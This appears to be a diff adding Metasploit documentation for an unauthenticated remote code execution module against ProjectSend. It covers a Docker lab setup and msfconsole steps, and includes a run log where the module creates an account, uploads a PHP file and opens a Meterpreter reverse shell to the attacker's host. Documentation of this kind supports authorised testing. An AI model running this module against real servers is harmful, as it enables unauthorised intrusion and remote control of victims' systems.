|
| 1 | +## Vulnerable Application |
| 2 | +ProjectSend is a web application used for sharing files with clients. |
| 3 | + |
| 4 | +Due to POST parameters being executed before checking user permissions, |
| 5 | +it is possible to perform a series of actions that can result in unauthenticated Remote Code Execution (RCE) |
| 6 | +on vulnerable versions of ProjectSend. |
| 7 | + |
| 8 | +This module has been tested against ProjectSend versions r1295 through r1605 on Linux. |
| 9 | + |
| 10 | +The easiest way to obtain a vulnerable version of ProjectSend is by deploying it using Docker, as pre-made images exist for the software. |
| 11 | +The following Docker Compose file can be used to set up a vulnerable environment. |
| 12 | + |
| 13 | +``` |
| 14 | +--- |
| 15 | + services: |
| 16 | + projectsend: |
| 17 | + image: lscr.io/linuxserver/projectsend:version-r1605 |
| 18 | + container_name: projectsend |
| 19 | + environment: |
| 20 | + - PUID=1000 |
| 21 | + - PGID=1000 |
| 22 | + - TZ=Etc/UTC |
| 23 | + - MAX_UPLOAD=5000 |
| 24 | + volumes: |
| 25 | + - ./projectsend/config:/config |
| 26 | + - ./projectsend/data:/data |
| 27 | + ports: |
| 28 | + - 80:80 |
| 29 | + restart: unless-stopped |
| 30 | + db: |
| 31 | + image: mariadb |
| 32 | + restart: unless-stopped |
| 33 | + container_name: db |
| 34 | + volumes: |
| 35 | + - ./mariadb_data:/var/lib/mysql |
| 36 | + environment: |
| 37 | + MYSQL_ROOT_PASSWORD: password |
| 38 | + MYSQL_DATABASE: projectsend |
| 39 | + MYSQL_USER: projectsend |
| 40 | + MYSQL_PASSWORD: projectsend |
| 41 | +``` |
| 42 | +After launching the containers, ProjectSend requires an initial configuration, |
| 43 | +which can be completed by accessing it via port 80 on localhost. |
| 44 | + |
| 45 | +## Verification Steps |
| 46 | + |
| 47 | +1. Install the application |
| 48 | +2. Start msfconsole |
| 49 | +3. Do: `use exploit/linux/http/projectsend_unauth_rce` |
| 50 | +4. Set remote hosts: `set RHOSTS <ip>` |
| 51 | +5. Set remote port: `set RPORT <port>` |
| 52 | +6. Set the path to ProjectSend: `set TARGETURI <URI>` |
| 53 | +7. Set local host: `set LHOST <local ip>` |
| 54 | +8. Do: `run` |
| 55 | +9. You should get a shell |
| 56 | + |
| 57 | +``` |
| 58 | +msf6 exploit(linux/http/projectsend_unauth_rce) > options |
| 59 | +
|
| 60 | +Module options (exploit/linux/http/projectsend_unauth_rce): |
| 61 | +
|
| 62 | + Name Current Setting Required Description |
| 63 | + ---- --------------- -------- ----------- |
| 64 | + Proxies no A proxy chain of format type:host:port[,type:host:port][...] |
| 65 | + RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html |
| 66 | + RPORT 80 yes The target port (TCP) |
| 67 | + SSL false no Negotiate SSL/TLS for outgoing connections |
| 68 | + TARGETURI / yes The TARGETURI for ProjectSend |
| 69 | + VHOST no HTTP server virtual host |
| 70 | +
|
| 71 | +
|
| 72 | +Payload options (php/meterpreter/reverse_tcp): |
| 73 | +
|
| 74 | + Name Current Setting Required Description |
| 75 | + ---- --------------- -------- ----------- |
| 76 | + LHOST 192.168.1.20 yes The listen address (an interface may be specified) |
| 77 | + LPORT 4444 yes The listen port |
| 78 | +
|
| 79 | +
|
| 80 | +Exploit target: |
| 81 | +
|
| 82 | + Id Name |
| 83 | + -- ---- |
| 84 | + 0 PHP Command |
| 85 | +``` |
| 86 | + |
| 87 | +## Options |
| 88 | +N/A - Only default options. |
| 89 | + |
| 90 | +## Scenarios |
| 91 | +``` |
| 92 | +msf6 exploit(linux/http/projectsend_unauth_rce) > run |
| 93 | +
|
| 94 | +[*] Started reverse TCP handler on 192.168.1.20:4444 |
| 95 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 96 | +[+] The target is vulnerable. |
| 97 | +[+] Client registration successfully enabled |
| 98 | +[+] User alvin.padberg created with password lrASo3iM |
| 99 | +[*] Disabling upload restrictions... |
| 100 | +[*] Logging in as alvin.padberg... |
| 101 | +[+] Logged in as alvin.padberg |
| 102 | +[+] Successfully uploaded PHP file: sX1A4FCH.php |
| 103 | +[*] Sending stage (39927 bytes) to 192.168.1.20 |
| 104 | +[*] Meterpreter session 1 opened (192.168.1.20:4444 -> 192.168.1.20:56675) at 2024-09-23 19:01:29 +0200 |
| 105 | +[*] Logging in as alvin.padberg... |
| 106 | +[+] Logged in as alvin.padberg |
| 107 | +[+] Client registration successfully disabled |
| 108 | +[*] Enabling upload restrictions... |
| 109 | +
|
| 110 | +meterpreter > sysinfo |
| 111 | +Computer : 1480205e55c2 |
| 112 | +OS : Linux 1480205e55c2 6.6.26-linuxkit #1 SMP Sat Apr 27 04:13:19 UTC 2024 aarch64 |
| 113 | +Meterpreter : php/linux |
| 114 | +``` |
0 commit comments